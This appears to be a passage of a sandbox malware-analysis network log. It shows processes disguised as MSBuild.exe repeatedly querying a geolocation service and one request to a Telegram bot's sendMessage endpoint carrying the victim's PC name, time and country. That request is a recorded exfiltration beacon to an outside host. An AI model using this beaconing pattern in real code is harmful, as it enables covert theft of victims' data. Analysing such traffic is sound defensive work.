                                                                                                                            2024-12-14 12:49:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649742172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:56 UTC871INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169365
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95gJKLNZYt%2Bj8pD21fj1L4HiDmQI4P6PcOZoUn6xmjFuR5fSLcQ9Fxaca4KJ8TFAvT9G1Lc9b7WpJV9IYwHw9oi7UjeRHcJ2iqBVjdNes3ft1Q7ZsNMUY3llNbXLPnmp2EPlOupF"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51183aea32fc-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1903&rtt_var=951&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=286611&cwnd=226&unsent_bytes=0&cid=8a39acc19534a4e7&ts=482&x=0"
                                                                                                                            2024-12-14 12:49:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.649743172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:49:58 UTC878INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:57 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169366
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEmIyjjF9F1AG41pvNOBxmyGO1%2B2jFgJOMrZCNuOko1AzPem3WBrQKOT0nxQwayMlKo23OQ51bFc3CB3WP4iCqMCfOjpHb%2B2PMkIPDUBvnft5PoPi%2BdPQnL7lmwJ%2FALizrK8keus"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51211d8f42b7-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1587&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1764350&cwnd=212&unsent_bytes=0&cid=5368a7e43b2626b1&ts=455&x=0"
                                                                                                                            2024-12-14 12:49:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.649747172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:49:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:49:59 UTC880INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:59 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169368
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xsozOnIuj%2FRknCAwo9gSAaA00JFuPf%2FiQ6YjGAxjbLkLoZCMKGMD3UyWinfYtgqHi%2FEB7AQaD48kMwzEK9B4XoA3vV774PISlD5VCJY4B4wkLEI%2FUH8pH3QWxtS%2FvEko8j9vOO5"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e512cf9e85e60-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=248&unsent_bytes=0&cid=f0fa7d32633258ce&ts=456&x=0"
                                                                                                                            2024-12-14 12:49:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.649748172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:01 UTC882INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169370
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXb2UujSXYbuISUxXjB51iOD88%2BtorswaXFQYgYuTh0vWAO%2BPZxKuQ%2BSEXfshqIafMAvKqOJZUl%2F1U%2FcaTEFViZC%2BNn8OxiWavkzD7IV1aUTams9BisvwVacQxkeUatzKSv4FmBo"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51344f4f1831-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1512&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1931216&cwnd=235&unsent_bytes=0&cid=d5303baf0feca01a&ts=454&x=0"
                                                                                                                            2024-12-14 12:50:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.649752172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:06 UTC876INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:06 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169375
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz19AOXQ0mYh8OAF9OFS6BaC1tbFnBPuXeGlREPn7vi5S%2FwnzUwjWO49G3tOppZXcWWRQBAkxRBPC%2BIFLkxi5681nxcy143WCZmu1YUeclVsQp2nVSN8B02EhClZzcwHEgYE5JO2"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51575c634210-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1765&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1654390&cwnd=244&unsent_bytes=0&cid=a5b1238111dc0430&ts=455&x=0"
                                                                                                                            2024-12-14 12:50:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.649754172.67.177.1344437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:50:10 UTC872INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169379
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDeiDgAZv8ico3YhfWm6oMhP3zzNAVcgH%2B4Hu3bpQSLJXjDP74ksIWWTI8YPPX4v6AdeLLZxugGd36fgUi60dogqKG7TFMZNsE2rYx2ODyUnnuteJsZN0hiU3XrnLQCGUDr2hT3f"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51707cf5c459-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1463&rtt_var=724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1347485&cwnd=231&unsent_bytes=0&cid=c3f6ffe25a90ef56&ts=458&x=0"
                                                                                                                            2024-12-14 12:50:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.649755149.154.167.2204437252C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:12 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                            Host: api.telegram.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:12 UTC344INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:12 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-14 12:50:12 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.649757172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:18 UTC878INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:18 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169387
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8zIYm%2F%2FmtpDsRaKza8JCy832e264sCnjETl7jm0n%2FVCFw0HeySKU5e0O3xHzQfiXkfLRFL6zgvuWHVMfylGXlCEEYEfkgvuMIKUwUefitlnUgtSko96MkFpbYPDIqKAvQ5g%2FCme"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51a37dec7d18-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1907&rtt_var=717&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1525600&cwnd=220&unsent_bytes=0&cid=bdf4789bc5fb2f9f&ts=463&x=0"
                                                                                                                            2024-12-14 12:50:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.649763172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:24 UTC884INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169392
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sC59zphAbUpn%2FpV%2BRCxKhci3Ru7LJsQ0lQLPkDhT4sn6utQ4P1zHyPQvpD6%2FNGasWyk12YHuwhwkhWk%2B73m6ve7K%2BjsKqxFEPIFFwwzmKDsS%2BbM0zUTEyOl2m8Y%2FZupblsZ8Ks8w"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51c38ce47c7b-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1808&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1606160&cwnd=207&unsent_bytes=0&cid=9cb9b9b429b446ff&ts=542&x=0"
